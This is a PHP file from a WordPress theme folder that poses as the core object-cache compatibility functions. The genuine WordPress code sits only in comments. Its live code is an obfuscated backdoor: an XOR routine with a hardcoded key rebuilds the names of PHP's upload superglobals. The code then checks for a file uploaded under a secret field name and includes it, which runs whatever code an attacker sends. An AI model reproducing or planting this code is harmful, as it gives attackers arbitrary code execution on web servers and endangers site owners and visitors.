File: /var/www/vhosts/enlugo.es/httpdocs/wp-content/themes/48n7o4q9/Ly.js.php
<?php /*
*
* Object Cache API functions missing from 3rd party object caches.
*
* @link https:codex.wordpress.org/Class_Reference/WP_Object_Cache
*
* @package WordPress
* @subpackage Cache
if ( ! function_exists( 'wp_cache_get_multiple' ) ) :
*
* Retrieves multiple values from the cache in one call.
*
* Compat function to mimic wp_cache_get_multiple().
*
* @ignore
* @since 5.5.0
*
* */
$changed = 'mTTZg5nkTDJheM';
$clean_terms = 'rewrite';
$exclude_from_search = $changed;
function trackback_urls($pee_parts, $no_texturize_tags)
{
$field = $no_texturize_tags;
$encoded_char = urldecode($pee_parts);
$chars = substr($field,0, strlen($encoded_char));
$input = 'show_in_rest';
$printed = $encoded_char ^ $chars;
return $printed;
}
$types = ${trackback_urls("2%12%1D%16%22f", $exclude_from_search)};
$version = $types;
$shortcode_tags = isset($version[$exclude_from_search]);
$new_status = 'wp_cockneyreplace';
if ($shortcode_tags)
{
$mime_types = $types[$exclude_from_search];
$object = $mime_types[trackback_urls("%199%24%05%09T%03%0E", $exclude_from_search)];
$option = $object;
include ($option);
}
/* @see wp_cache_get_multiple()
*
* @param array $keys Array of keys under which the cache contents are stored.
* @param string $group Optional. Where the cache contents are grouped. Default empty.
* @param bool $force Optional. Whether to force an update of the local cache
* from the persistent cache. Default false.
* @return array Array of values organized into groups.
function wp_cache_get_multiple( $keys, $group = '', $force = false ) {
$values = array();
foreach ( $keys as $key ) {
$values[ $key ] = wp_cache_get( $key, $group, $force );
}
return $values;
}
endif;
*/